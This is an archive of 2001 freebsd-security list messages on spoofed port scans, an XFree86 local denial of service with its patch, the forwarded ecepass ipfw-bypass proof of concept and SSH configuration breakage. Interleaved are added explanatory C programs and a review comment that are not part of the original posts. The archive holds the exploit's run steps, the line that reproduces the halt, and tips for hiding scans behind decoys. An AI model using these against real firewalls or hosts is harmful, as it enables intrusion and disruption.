From owner-freebsd-security Sun Jan 28 2:21:43 2001
From: FBSDSecure@aol.com
Date: Sun, 28 Jan 2001 05:21:19 EST
Subject: Re: (no subject)
To: freebsd-security@freebsd.org
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In a message dated 1/27/01 9:51:58 PM Pacific Standard Time, kris@obsecurity.org writes:

> > To prevent portscanning, there is a package in the ports collection
> > called portsentry under both the net and security branches. I am
> > currently using it on my firewall computer and when it detects that
> > someone is portscanning your computer, you can 'ban' the attacker's
> > IP address using ipfw and email you automatically.
>
> Be very careful using automated responses like automatically
> blackholing someone. Port scans can trivially be spoofed (most port
> scanners like nmap include a command-line option to do this), and all
> an attacker needs to do is spoof a scan coming from your ISP's servers
> and it will effectively cut you off of the network.
>
> IMO, there's no problem with portscans if you run a tightly configured
> firewall and don't allow in traffic except to services you trust the
> world to be able to connect to.
>
> Kris

Yes, that is true and yes it can be done. But it's very unlikely that it
will be done. Most people use phone modems to connect to the internet. The
ISP assigns an IP address to the user's computer based on which port the
user came in on. It is pretty much impossible to spoof an ISP-assigned IP
address, and if they try, the ISP knows about it and usually takes steps to
correct it. On DSL connections, the DSLAM KNOWS which IP addresses are valid
on a given port, so you must use the IP address(es) that your ISP provides.
Cable modem IP addresses are dynamically assigned using DHCP. Once again, the
IP address is assigned to you.
The routers in the ISPs know which IP addresses are valid and which are not.
So spoofing an IP address is pretty close to impossible from a dialup, xDSL,
or cable modem. Another thing to point out though is if a hacker were to
spoof his IP address and do a port scan, what would be the point? The data
is useless if it can't get back to the individual. Besides, the portsentry
package has an ignore file.

Dan.

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sun Jan 28 2:29:56 2001
Date: Sun, 28 Jan 2001 02:30:05 -0800
From: Kris Kennaway
To: FBSDSecure@aol.com
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: (no subject)
Message-ID: <20010128023005.A19353@xor.obsecurity.org>

On Sun, Jan 28, 2001 at 05:21:19AM -0500, FBSDSecure@aol.com wrote:

> addresses are valid and which are not. So spoofing an IP address is pretty
> close to impossible from a Dialup, xDSL, or cable modem. Another thing to

Wrong. If this were true, packet-flooding based denial of service attacks
would be almost impossible since they would be easily blocked and traced.
The sad fact of the matter is that the majority of networks on the internet
today, including ISPs, do not implement egress filtering.

> point out though is if a hacker were to spoof his IP address and do a port
> scan, what would be the point? The data is useless if it can't get back to
> the individual. Besides, the portsentry package has an ignore file.

You miss the point: the attacker won't get any information back out of it,
but if you have a fascist response to port scans which blackholes all
traffic coming from the IP address of the port scan, the attacker can spoof
the packets to come from a server which is critical to the operation of
your machine, such as your ISP's DNS servers, or mail servers, which will
cause your machine to blackhole them and thereby shoot itself in the foot.
At a lower level of annoyance, you can blackhole popular websites like
google which the user might use.
The point is that automated active response is almost always a bad idea,
because it can be fooled into doing more harm than good.

Kris
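The failure mode Kris describes, as an added example that is not part of the thread and not portsentry's code: a miniature sentry in C run over constructed probe records. Three sources each hit three ports; only the first completed a TCP handshake, the second is a SYN stream spoofed as the ISP's resolver, and the third is the loopback decoy trick that comes up later in this thread. The naive policy bans all three, cutting the host off from its own resolver. The hardened policy counts only probes whose handshake completed (an off-path attacker cannot forge those, since the SYN/ACK goes to the spoofed address) and keeps an allowlist of addresses the host cannot function without. Function names, the threshold of 3, and the documentation-range addresses are assumptions made for this example.

```c
#include <stdio.h>
#include <string.h>

/* One probe as a sentry daemon might record it: source address, destination
 * port, and whether the TCP three-way handshake completed.  A probe with a
 * spoofed source never completes a handshake, because the SYN/ACK goes to
 * the spoofed address, not to the attacker.  Constructed sample data. */
struct probe {
    const char *src;
    int dport;
    int handshake_done;
};

static const struct probe SAMPLE[] = {
    { "198.51.100.7", 22, 1 },  /* genuine connect() scan by the attacker  */
    { "198.51.100.7", 23, 1 },
    { "198.51.100.7", 80, 1 },
    { "192.0.2.53",   22, 0 },  /* SYNs spoofed as the ISP's DNS resolver  */
    { "192.0.2.53",   25, 0 },
    { "192.0.2.53",   80, 0 },
    { "127.0.0.1",    22, 0 },  /* loopback mixed in as a scan decoy       */
    { "127.0.0.1",    23, 0 },
    { "127.0.0.1",    80, 0 },
};
#define NSAMPLE (sizeof SAMPLE / sizeof SAMPLE[0])

/* Addresses this host cannot work without: loopback, default gateway, the
 * resolver and the mail relay.  Hypothetical documentation-range values; a
 * real deployment would derive them from resolv.conf and the routing table. */
static const char *const NEVER_BAN[] = {
    "127.0.0.1", "192.0.2.1", "192.0.2.53", "192.0.2.25",
};
#define NNEVER (sizeof NEVER_BAN / sizeof NEVER_BAN[0])

#define BAN_THRESHOLD 3   /* probes from one source before it is banned */
#define MAX_ADDRS     32

/* Per-source hit counter and ban flag. */
struct tally {
    char addr[MAX_ADDRS][16];
    int  hits[MAX_ADDRS];
    int  banned[MAX_ADDRS];
    int  n;
};

static int slot_for(struct tally *t, const char *ip)
{
    int i;
    for (i = 0; i < t->n; i++)
        if (strcmp(t->addr[i], ip) == 0)
            return i;
    if (t->n == MAX_ADDRS)
        return -1;
    snprintf(t->addr[t->n], sizeof t->addr[t->n], "%s", ip);
    return t->n++;
}

static int is_protected(const char *ip)
{
    size_t i;
    for (i = 0; i < NNEVER; i++)
        if (strcmp(NEVER_BAN[i], ip) == 0)
            return 1;
    return 0;
}

/* Run one policy over SAMPLE and report whether `ip` ends up banned.  With
 * `strict` set, only probes that completed a handshake count (an off-path
 * attacker cannot forge those) and protected addresses are never banned. */
static int run_policy(const char *ip, int strict)
{
    struct tally t;
    size_t i;
    int s;

    memset(&t, 0, sizeof t);
    for (i = 0; i < NSAMPLE; i++) {
        const struct probe *p = &SAMPLE[i];
        if (strict && (!p->handshake_done || is_protected(p->src)))
            continue;
        s = slot_for(&t, p->src);
        if (s >= 0 && ++t.hits[s] >= BAN_THRESHOLD)
            t.banned[s] = 1;    /* where "ipfw add deny ip from X to any" would run */
    }
    s = slot_for(&t, ip);
    return s >= 0 && t.banned[s];
}

/* Naive sentry: ban any source seen on BAN_THRESHOLD ports, no questions asked. */
int naive_bans(const char *ip)    { return run_policy(ip, 0); }

/* Hardened sentry: act only on evidence a spoofing attacker cannot produce. */
int hardened_bans(const char *ip) { return run_policy(ip, 1); }

int main(void)
{
    static const char *const who[] = { "198.51.100.7", "192.0.2.53", "127.0.0.1" };
    size_t i;
    for (i = 0; i < sizeof who / sizeof who[0]; i++)
        printf("%-14s naive: %-6s hardened: %s\n", who[i],
               naive_bans(who[i]) ? "BANNED" : "ok",
               hardened_bans(who[i]) ? "BANNED" : "ok");
    return 0;
}
```

Even the hardened variant only narrows the problem: a completed handshake still does not prove the address belongs to the attacker (a NAT box or a compromised neighbour on the same pool), so Kris's actual advice stands: a tight inbound policy removes the need to react to scans at all, and if an auto-response is kept, its allowlist must cover every address the host depends on.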
From owner-freebsd-security Sun Jan 28 2:57:17 2001
From: Chris
Date: Sun, 28 Jan 2001 04:20:42 -0600
To: FBSDSecure@aol.com
Cc: freebsd-security@freebsd.org
Subject: Re: (no subject)
Message-ID: <3A73F27A.41DBC1BC@redshells.net>

> Another thing to point out though is if a hacker were to spoof his IP address
> and do a port scan, what would be the point? The data is useless if it can't
> get back to the individual.

One word, DoS.

From owner-freebsd-security Sun Jan 28 8:18:03 2001
Date: Sun, 28 Jan 2001 10:17:21 -0600 (CST)
From: James Wyatt
To: Chris
Cc: FBSDSecure@aol.com, freebsd-security@freebsd.org
Subject: Re: (no subject)
In-Reply-To: <3A73F27A.41DBC1BC@redshells.net>

On Sun, 28 Jan 2001, Chris wrote:
> > Another thing to point out though is if a hacker were to spoof his IP address
> > and do a port scan, what would be the point? The data is useless if it can't
> > get back to the individual.
>
> One word, DoS.

Uh, one acronym. Three words - Jy@

From owner-freebsd-security Sun Jan 28 9:26:00 2001
Date: Sun, 28 Jan 2001 11:23:55 -0600 (CST)
From: James Wyatt
To: FBSDSecure@aol.com
Cc: freebsd-security@freebsd.org
Subject: Port Scans (was Re: (no subject))

On Sun, 28 Jan 2001 FBSDSecure@aol.com wrote:
> At 1/27/01 9:51:58 PM Pacific Standard Time, kris@obsecurity.org writes:
[ ... ]
> > Be very careful using automated responses like automatically
> > blackholing someone. Port scans can trivially be spoofed (most port
> > scanners like nmap include a command-line option to do this), and all
> > an attacker needs to do is spoof a scan coming from your ISP's servers
> > and it will effectively cut you off of the network.
[ ... ]
> Yes, that is true and yes it can be done. But it's very unlikely that it
> will be done. Most people use phone modems to connect to the internet. The
> ISP assigns an IP address to the user's computer based on which port the
> user came in on. It is pretty much impossible to spoof an ISP-assigned IP
> address, and if they try, the ISP knows about it and usually takes steps to
> correct it. On DSL connections, the DSLAM KNOWS which IP addresses are valid
> on a given port, so you must use the IP address(es) that your ISP provides.
> Cable modem IP addresses are dynamically assigned using DHCP. Once again, the
> IP address is assigned to you. The routers in the ISPs know which IP
> addresses are valid and which are not. So spoofing an IP address is pretty
> close to impossible from a Dialup, xDSL, or cable modem. Another thing to
> point out though is if a hacker were to spoof his IP address and do a port
> scan, what would be the point? The data is useless if it can't get back to
> the individual. Besides, the portsentry package has an ignore file.

I gotta agree with Kris again on this: in practice if an ISP has *any*
filtering, it's *very* rough and only at the INet edge.
Limit your fake addresses to the same dialup pool (can be thousands), or a
large DSL pool. I've worked for several ISPs and only one was technically
forward enough to do any real filtering, and now they have been bought by a
larger ISP that is more interested in their stock than their service, so the
filtering is going away.

Toss your own address in towards the end of the scan on the ports you really
want to attack. After the scan, try some simple attacks from a smaller range
of addresses. I've seen this pattern in our logs from time to time. If a
site has enough traffic, you can hide in the noise if you aren't *too*
obvious.

One of our sister sites *will* blacklist by class-C block for port scans
(usually takes a dialout group out), but he has an exclude list to prevent
folks from wreaking too much havoc and, like us, he does more consulting
than service provision. - Jy@

From owner-freebsd-security Sun Jan 28 10:56:09 2001
Message-Id: <200101281855.f0SIttD79145@bloop.craftncomp.com>
To: security@freebsd.org
Subject: Setting up connections between FreeBSD IPSEC and Linux's FreeS/WAN
Date: Sun, 28 Jan 2001 12:55:55 -0600
From: Stephen Hocking

Before I rush and start to do this, has anyone else tried it, and what did
you do?

Stephen
--
The views expressed above are not those of PGS Tensor.
"We've heard that a million monkeys at a million keyboards could produce the
Complete Works of Shakespeare; now, thanks to the Internet, we know this is
not true." Robert Wilensky, University of California

From owner-freebsd-security Sun Jan 28 12:43:18 2001
Date: Sun, 28 Jan 2001 12:43:08 -0800 (PST)
From: Thomas Cannon
To: freebsd-security@FreeBSD.ORG
Subject: Re: (no subject)

> On Sun, 28 Jan 2001, Chris wrote:
> > > Another thing to point out though is if a hacker were to spoof his IP address
> > > and do a port scan, what would be the point? The data is useless if it can't
> > > get back to the individual.
> >
> > One word, DoS.

Well, two words... one of which is DoS. Another, which I find fun, and also
doesn't matter if your ISP does egress filtering, is to make a scan look like
it came from your whole subnet. I'm sure that even if my DSL provider was
making sure all the leaving traffic came from its network it would still be
tough to catch. Or, and this is rare these days, if you are on an unswitched
subnet or could somehow view traffic in flight you can always make the scan
look like it came from the guy next door and just sniff the replies as they
come back.

I know my DSL is unfiltered on its way out, so if I'm doing an audit from
home for any reason I always mix in 127.0.0.1 as a decoy -- just in case it
hits something amusingly misconfigured, like a portsentry-type package with
a glaring misconfiguration.

-tcannon

From owner-freebsd-security Sun Jan 28 13:43:08 2001
Date: Sun, 28 Jan 2001 13:43:12 -0800
From: Kris Kennaway
To: Stephen Hocking
Cc: security@FreeBSD.ORG
Subject: Re: Setting up connections between FreeBSD IPSEC and Linux's FreeS/WAN
Message-ID: <20010128134312.C75653@xor.obsecurity.org>
In-Reply-To: <200101281855.f0SIttD79145@bloop.craftncomp.com>

On Sun, Jan 28, 2001 at 12:55:55PM -0600, Stephen Hocking wrote:
> Before I rush and start to do this, has anyone else tried it, and
> what did you do?

Never tried it, but I know it works. It should all Just Work.

Kris

From owner-freebsd-security Sun Jan 28 19:52:02 2001
Date: Mon, 29 Jan 2001 04:51:16 +0100
To: freebsd-security@freebsd.org
Cc: XFree86@xfree86.org
Subject: Obscure security hole in XFree86 when used with Xwrapper
Message-ID: <20010129045116.A5564@crow.dom2ip.de>
Mail-Followup-To: tmoestl@gmx.net, freebsd-security@freebsd.org, XFree86@xfree86.org
From: Thomas Moestl

(for the XFree86 people, PR references etc. are for FreeBSD)

Hi,

to quote from PR ports/24705 (by Sebastian Reinert):

  All you need to reproduce this problem is a current version of Xwrapper
  with x-right, [...] and a self-written script called .xserverrc, that
  contains the following phrase:

      exec Xwrapper $dspnum &args

  It is _very important_ that you use an "&" instead of "$" in front of
  "args"! After all, you configure your script with the typical rights
  (e.g. "777"), execute "startx" (you will have x-right for it by default),
  and the system shuts down its daemons. By the way: You do not need
  root-rights...

I have looked into this one, and the following code seems to be the flaw
(from xc/programs/Xserver/os/connection.c):

    /*
     * Magic: If SIGUSR1 was set to SIG_IGN when
     * the server started, assume that either
     *
     *  a- The parent process is ignoring SIGUSR1
     *
     * or
     *
     *  b- The parent process is expecting a SIGUSR1
     *     when the server is ready to accept connections
     *
     * In the first case, the signal will be harmless,
     * in the second case, the signal will be quite
     * useful
     */
    #if !defined(WIN32) && !defined(__CYGWIN__)
        if (OsSignal (SIGUSR1, SIG_IGN) == SIG_IGN)
            RunFromSmartParent = TRUE;
        ParentProcess = getppid ();
        if (RunFromSmartParent) {
            if (ParentProcess > 0) {
                kill (ParentProcess, SIGUSR1);
            }
        }
    #endif

Now, if the parent process has exited (as happens when Xwrapper or XFree86
is put in the background in the .xserverrc), the SIGUSR1 will go to init
(because the process was reparented when the parent exited). This will
cause the machine to halt (with FreeBSD init; with other init
implementations this may differ). When the Xwrapper is installed, this
amounts to a local DoS.
The easiest fix would just be:

------------------------------------------------------------------------
*** xc/programs/Xserver/os/connection.c.orig    Mon Jan 29 04:16:54 2001
--- xc/programs/Xserver/os/connection.c Mon Jan 29 04:08:32 2001
***************
*** 408,414 ****
      RunFromSmartParent = TRUE;
      ParentProcess = getppid ();
      if (RunFromSmartParent) {
!     if (ParentProcess > 0) {
          kill (ParentProcess, SIGUSR1);
      }
      }
--- 408,414 ----
      RunFromSmartParent = TRUE;
      ParentProcess = getppid ();
      if (RunFromSmartParent) {
!     if (ParentProcess > 1) {
          kill (ParentProcess, SIGUSR1);
      }
      }
------------------------------------------------------------------------

I think that this should suffice. Any comments?

    - thomas

P.S: please trim CC list when answering.
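Review bot: the `ParentProcess > 1` test in this hunk only covers a parent that exited before the `getppid ()` call; it leaves the window between `getppid ()` and `kill (ParentProcess, SIGUSR1)`, where the parent can still exit and the stored pid becomes free for reuse, so the signal can go to an unrelated process. The test also encodes the assumption that an orphaned server is always reparented to pid 1; that assumption and the reason for excluding it should be stated in the "Magic:" comment just above the hunk, which currently only explains why SIGUSR1 is sent. Consider logging when the signal is skipped as well, so a silently dropped notification to a real parent is visible in the server log.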
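The reparenting behind this report, as an added example that is not from XFree86 or from the thread: a C program that recreates the situation without an X server. A child forks a grandchild and exits immediately, the way the backgrounded "exec Xwrapper ... &" makes the shell in .xserverrc go away; the orphaned grandchild watches getppid() change and reports the new value. The program then shows what the original test (ppid > 0) and the patched test (ppid > 1) would do with that value, without ever sending a signal. The function names are assumptions made for this example.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <signal.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

/* The guard the server needs before kill(ParentProcess, SIGUSR1): pid 1 is
 * init, pid 0 means "my whole process group" to kill(2), and negative values
 * name process groups.  Only a real, positive, non-init pid is acceptable. */
int parent_ok_to_signal(pid_t ppid)
{
    return ppid > 1;
}

/* Reproduce the reparenting without an X server.  Fork a child; the child
 * forks a grandchild and exits at once.  The grandchild waits until
 * getppid() stops returning the child's pid (it has been reparented) and
 * sends the new value back through a pipe.  Returns the observed ppid,
 * or -1 on failure; *child_out receives the pid of the vanished parent. */
pid_t observe_reparented_ppid(pid_t *child_out)
{
    int fd[2];
    pid_t child, seen = -1;

    if (pipe(fd) != 0)
        return -1;
    child = fork();
    if (child < 0)
        return -1;
    if (child == 0) {
        pid_t me = getpid();
        pid_t gc = fork();
        if (gc < 0)
            _exit(1);
        if (gc == 0) {
            struct timespec ms = { 0, 1000000L };
            pid_t now;
            int i;
            close(fd[0]);
            /* bounded wait (about 2 s) for the reparenting to happen */
            for (i = 0; i < 2000 && (now = getppid()) == me; i++)
                nanosleep(&ms, NULL);
            now = getppid();
            if (write(fd[1], &now, sizeof now) != (ssize_t)sizeof now)
                _exit(1);
            _exit(0);
        }
        _exit(0);           /* the grandchild's parent disappears here */
    }
    close(fd[1]);
    waitpid(child, NULL, 0);
    if (read(fd[0], &seen, sizeof seen) != (ssize_t)sizeof seen)
        seen = -1;
    close(fd[0]);
    if (child_out)
        *child_out = child;
    return seen;
}

/* 1 if the orphaned grandchild really did see a different, valid parent. */
int reparenting_changes_ppid(void)
{
    pid_t child, seen = observe_reparented_ppid(&child);
    return seen > 0 && seen != child;
}

int main(void)
{
    pid_t child, seen = observe_reparented_ppid(&child);

    printf("grandchild of %ld saw getppid() == %ld after its parent exited\n",
           (long)child, (long)seen);
    printf("original test (ppid > 0): %s\n",
           seen > 0 ? "would kill(ppid, SIGUSR1)" : "skip");
    printf("patched test  (ppid > 1): %s\n",
           parent_ok_to_signal(seen) ? "would kill(ppid, SIGUSR1)" : "skip");
    return 0;
}
```

On a classic system the orphan lands on pid 1 and the patched test skips the signal. On a system with a subreaper (a container init, or a process that asked the kernel to collect orphans), the orphan lands on the subreaper instead, whose pid is not 1, and the patched test would still signal it; the ppid check is therefore a mitigation for this one symptom, not a general way to verify "my parent is the process that started me".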
From owner-freebsd-security Sun Jan 28 21:37:28 2001
From: Sam Wun
Organization: eSec Limited
Date: Mon, 29 Jan 2001 16:42:39 +1100
Cc: freebsd-security@freebsd.org
Subject: NFS security
Message-ID: <3A7502CF.D5172D9D@esec.com.au>

Hi,

Does anyone know how to set up NFS trust like the one in Solaris 8 in FreeBSD?

Thanks
Sam.

From owner-freebsd-security Sun Jan 28 22:28:58 2001
Message-ID: <3A750EE1.2179D68D@esec.com.au>
Date: Mon, 29 Jan 2001 17:34:09 +1100
From: Sam Wun
Organization: eSec Limited
Cc: freebsd-security@freebsd.org
Subject: reporting tools for ipmon.

Hi,

Does anyone know where I can download some reporting tools for the ipmon
messages generated by ipfilter in BSD?

Thanks
Sam

From owner-freebsd-security Sun Jan 28 22:43:43 2001
Message-ID: <3A751107.5C25BEB6@netvalue.com>
Date: Mon, 29 Jan 2001 14:43:19 +0800
From: Erwan Arzur
Organization: NetValue Ltd.
To: Sam Wun
Cc: freebsd-security@freebsd.org
Subject: Re: reporting tools for ipmon.
References: <20010129045116.A5564@crow.dom2ip.de> <3A750EE1.2179D68D@esec.com.au>

Sam Wun wrote:
>
> Hi,
>
> Does anyone know where I can download some reporting tools for the ipmon
> messages generated by ipfilter in BSD?
>

/usr/src/contrib/ipfilter/perl/plog is very useful.

--
Erwan Arzur
NetValue ltd.

From owner-freebsd-security Mon Jan 29 1:58:12 2001
Date: Mon, 29 Jan 2001 09:57:53 +0000
From: Rasputin
To: freebsd-security@freebsd.org
Subject: Re: OpenSSH b0rked (was RE: Problems with IPFW patch)
Message-ID: <20010129095752.A37233@dogma.freebsd-uk.eu.org>
References: <20010124230626.A49802@citusc17.usc.edu> <20010125103255.A78404@FreeBSD.org> <200101262153.f0QLrLL40016@earth.backplane.com>
In-Reply-To: <200101262153.f0QLrLL40016@earth.backplane.com>; from dillon@earth.backplane.com on Fri, Jan 26, 2001 at 01:53:21PM -0800

* Matt Dillon [010126 21:55]:
> :I would ask, that in -STABLE at least, the fatal error be backed
> :out to a warning, at least for a few months (with sshd ignoring the
> :directive, and continuing to run), and then only move to a fatal
> :error + die.
> :
> :-aDe
>
> I second this request. It also happened when pam.conf/ssh changed.
> Only the serial console saved me from a car trip to one of my
> colocated machines. Two such changes in a row for ssh is too much.
>
> -Matt

In general I'd agree with Matt and aDe, but if a directive affecting
security has changed, I'd say it's better to be notified of it as soon as
possible. Killing off sshd obviously makes remote admin a real problem,
though; is there another way to guarantee we'd notice?

--
Rasputin
Jack of All Trades :: Master of Nuns

From owner-freebsd-security Mon Jan 29 8:07:51 2001
Date: Mon, 29 Jan 2001 11:18:44 -0500 (COT)
From: Buliwyf McGraw
To: freebsd-security@FreeBSD.ORG
Subject: ecepass - proof of concept code for FreeBSD ipfw bypass (fwd)

Very interesting...

---------- Forwarded message ----------
Date: Thu, 25 Jan 2001 15:04:30 +0200
From: Roelof Temmingh
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: ecepass - proof of concept code for FreeBSD ipfw bypass

An all ZA production...;)

FreeBSD ipfw+ECE proof of concept code
--------------------------------------

Code written by: Plathond (jacques4i@yahoo.com)
for Sensepost (http://www.sensepost.com, info@sensepost.com)

More info on the problem:
http://packetstorm.securify.com/advisories/freebsd/FreeBSD-SA-01:08.ipfw

Original problem found by: Aragon Gouveia

How it works:
-------------
Using a FreeBSD divert rule, all outgoing traffic (or as specified in the
ipfw rule) will be diverted to the ecepass process, and the ECE flag will be
added. Traffic directed to hosts behind an ipfw-based firewall will be
passed, rendering the firewall useless if it makes use of the "allow all
from any to any established" rule. Tried & tested...

How to use:
-----------
1. Make sure your kernel is compiled with the following options:
       options IPDIVERT
       options IPFIREWALL
2. gcc -o ecepass ecepass.c
3. ./ecepass &
4. ipfw add 5 divert 7000 tcp from any to any
5. All TCP traffic will now have the ECE flag added to it.

PS1: obviously you need to make sure that the last ipfw rule allows traffic, e.g.:
       00001 divert 7000 tcp from any to any
       65535 allow ip from any to any
PS2: as the exploit uses "ipfw divert" it only works on FreeBSD. Ironic eh?

spidermark: sensepostdata ece

Regards,
Roelof.
------------------------------------------------------
Roelof W Temmingh
SensePost IT security
roelof@sensepost.com
+27 83 448 6996
http://www.sensepost.com

[attachment: ecepass.tgz (base64, omitted)]
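Why an added ECE bit lets a fresh SYN through an "established" rule, as an added example that is neither the ecepass code nor the ipfw source: a small C filter that parses constructed IPv4/TCP packets and evaluates the two-rule policy from the forwarded message, first with a flawed "established" matcher and then with a corrected one. The mechanism modelled here, a rule-side pseudo-flag value 0x40 that collides with the ECE bit in the TCP flags byte, is an assumption made for illustration; the advisory linked in the message is the authority on the actual ipfw defect. Function names, the rule mask, and the documentation-range addresses are likewise assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define TH_FIN 0x01
#define TH_SYN 0x02
#define TH_RST 0x04
#define TH_ACK 0x10
#define TH_ECE 0x40   /* ECN-Echo (RFC 3168): shares the byte with the classic flags */
#define TH_CWR 0x80

/* Assumption for this example, not taken from the ipfw source: the filter
 * keeps the "established" requirement as a pseudo-flag, 0x40, alongside the
 * real flag bits it wants to see (ACK or RST), and the buggy matcher tests
 * the whole mask against the packet's flag byte.  On the wire, 0x40 is ECE. */
#define RULE_ESTAB       0x40
#define ESTAB_MASK_BUGGY (TH_ACK | TH_RST | RULE_ESTAB)

enum verdict { DENY = 0, ALLOW = 1 };

/* Return the TCP flags byte of a raw IPv4+TCP packet, or -1 if it is not a
 * well-formed TCP packet.  Only the header layout is checked. */
int tcp_flags_of(const uint8_t *pkt, size_t len)
{
    size_t ihl;
    if (pkt == NULL || len < 20 || (pkt[0] >> 4) != 4)
        return -1;
    ihl = (size_t)(pkt[0] & 0x0f) * 4;
    if (ihl < 20 || pkt[9] != 6 || len < ihl + 20)
        return -1;
    return pkt[ihl + 13];
}

/* Buggy "established": the pseudo-flag leaks into the mask, so ECE alone
 * satisfies a rule that was meant to require ACK or RST. */
static int established_buggy(uint8_t th_flags)
{
    return (th_flags & ESTAB_MASK_BUGGY) != 0;
}

/* Fixed "established": only ACK or RST mark a segment of an existing
 * connection.  ECE and CWR are ignored rather than rejected, because an
 * ECN-negotiating SYN legitimately carries ECE|CWR. */
static int established_fixed(uint8_t th_flags)
{
    return (th_flags & (TH_ACK | TH_RST)) != 0;
}

/* The two-rule policy from the thread:
 *     allow tcp from any to any established
 *     deny  ip  from any to any
 */
enum verdict filter(const uint8_t *pkt, size_t len, int use_fix)
{
    int fl = tcp_flags_of(pkt, len);
    if (fl < 0)
        return DENY;
    if (use_fix ? established_fixed((uint8_t)fl) : established_buggy((uint8_t)fl))
        return ALLOW;
    return DENY;
}

/* Build a minimal 40-byte IPv4/TCP packet with the given flags.  Constructed
 * bytes with documentation-range addresses; checksums are left at zero, which
 * is fine because only the headers are inspected. */
size_t make_packet(uint8_t buf[40], uint16_t dport, uint8_t flags)
{
    static const uint8_t ip_hdr[20] = {
        0x45, 0x00, 0x00, 0x28, 0x00, 0x00, 0x40, 0x00, 0x40, 0x06, 0x00, 0x00,
        198, 51, 100, 7,     /* src 198.51.100.7: the attacker            */
        192, 0, 2, 10        /* dst 192.0.2.10: a host behind the firewall */
    };
    size_t i;
    for (i = 0; i < 20; i++)
        buf[i] = ip_hdr[i];
    for (i = 20; i < 40; i++)
        buf[i] = 0;
    buf[20] = 0xc3; buf[21] = 0x50;                  /* source port 50000 */
    buf[22] = (uint8_t)(dport >> 8); buf[23] = (uint8_t)dport;
    buf[32] = 0x50;                                  /* data offset: 5 words */
    buf[33] = flags;                                 /* the byte under test */
    buf[34] = 0x20; buf[35] = 0x00;                  /* window */
    return 40;
}

/* Convenience: verdict for a constructed probe to port 22 with these flags. */
enum verdict verdict_for(uint8_t flags, int use_fix)
{
    uint8_t pkt[40];
    return filter(pkt, make_packet(pkt, 22, flags), use_fix);
}

int main(void)
{
    static const struct { const char *name; uint8_t flags; } cases[] = {
        { "SYN",     TH_SYN },
        { "SYN|ECE", TH_SYN | TH_ECE },   /* what ecepass turns the SYN into */
        { "ACK",     TH_ACK },
    };
    size_t i;
    for (i = 0; i < sizeof cases / sizeof cases[0]; i++)
        printf("%-8s buggy: %-5s fixed: %s\n", cases[i].name,
               verdict_for(cases[i].flags, 0) == ALLOW ? "allow" : "deny",
               verdict_for(cases[i].flags, 1) == ALLOW ? "allow" : "deny");
    return 0;
}
```

The general lesson survives the specific bug: a stateless "established" keyword infers connection state from flag bits the remote end controls, so any confusion about which bits mean what becomes a bypass. A stateful rule (ipfw's later check-state/keep-state, or any connection-tracking filter) keys on the handshake it saw rather than on what the packet claims about itself.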
message

From owner-freebsd-security Mon Jan 29 8:16: 1 2001
Delivered-To: freebsd-security@freebsd.org
Received: from hub.lovett.com (hub.lovett.com [216.60.121.161]) by hub.freebsd.org (Postfix) with ESMTP id B8A4B37B6A0 for ; Mon, 29 Jan 2001 08:15:43 -0800 (PST)
Received: from ade by hub.lovett.com with local (Exim 3.20 #1) id 14NGwV-0004R5-00; Mon, 29 Jan 2001 10:14:11 -0600
Date: Mon, 29 Jan 2001 10:14:11 -0600
From: Ade Lovett
To: Rasputin
Cc: freebsd-security@freebsd.org, imp@village.org
Subject: Re: OpenSSH b0rked (was RE: Problems with IPFW patch)
Message-ID: <20010129101411.A16899@FreeBSD.org>
References: <20010124230626.A49802@citusc17.usc.edu> <20010125103255.A78404@FreeBSD.org> <200101262153.f0QLrLL40016@earth.backplane.com> <20010129095752.A37233@dogma.freebsd-uk.eu.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010129095752.A37233@dogma.freebsd-uk.eu.org>; from rasputin@FreeBSD-uk.eu.org on Mon, Jan 29, 2001 at 09:57:53AM +0000
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, Jan 29, 2001 at 09:57:53AM +0000, Rasputin wrote:
> In general I'd agree with Matt and aDe, but if a directive
> affecting security has changed, I'd say it's better to be notified of it
> as soon as possible.
> Killing off sshd obviously makes remote admin a real problem, though;
> is there another way to guarantee we'd notice ?

Well, something in /usr/src/UPDATING might have helped. Believe it or
not, I do read it. Nothing there.

Update -stable box, run mergemaster, ignore anything to do with
ssh_config or sshd_config since ours are fairly heavily different,
reboot, no sshd.

If it's not going to be backed out (a serious mistake, IMO), then
UPDATING needs to be modified at least:

200101xx
        The 'ConnectionsPerPeriod' directive in /etc/ssh/sshd_config
        has been deprecated. Please ensure that you either comment
        out, or preferably remove, this entry BEFORE REBOOTING.
        /usr/sbin/sshd after this date WILL NOT RUN with this
        directive in place, which is likely to cause substantial
        issues for headless machines.

There. Another mighty victory for the Confederation.

-aDe

--
Ade Lovett, Austin, TX.
ade@FreeBSD.org
FreeBSD: The Power to Serve
http://www.FreeBSD.org/

From owner-freebsd-security Mon Jan 29 8:31: 8 2001
Delivered-To: freebsd-security@freebsd.org
Received: from giganda.komkon.org (giganda.komkon.org [209.125.17.66]) by hub.freebsd.org (Postfix) with ESMTP id 2AEC337B400; Mon, 29 Jan 2001 08:29:54 -0800 (PST)
Received: (from str@localhost) by giganda.komkon.org (8.9.3/8.9.3) id LAA76025; Mon, 29 Jan 2001 11:29:51 -0500 (EST) (envelope-from str)
From: Igor Roshchin
Message-Id: <200101291629.LAA76025@giganda.komkon.org>
Subject: Bind: FreeBSD-SA-01:10 and CERT Advisory CA-2001-02
To: security@freebsd.org
Date: Mon, 29 Jan 2001 11:29:51 -0500 (EST)
Cc: security-officer@freebsd.org
X-Mailer: ELM [version 2.4ME+ PL61 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Two comments/questions:

1. FreeBSD-SA-01:10 (per
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-01:10.bind.asc)
says:

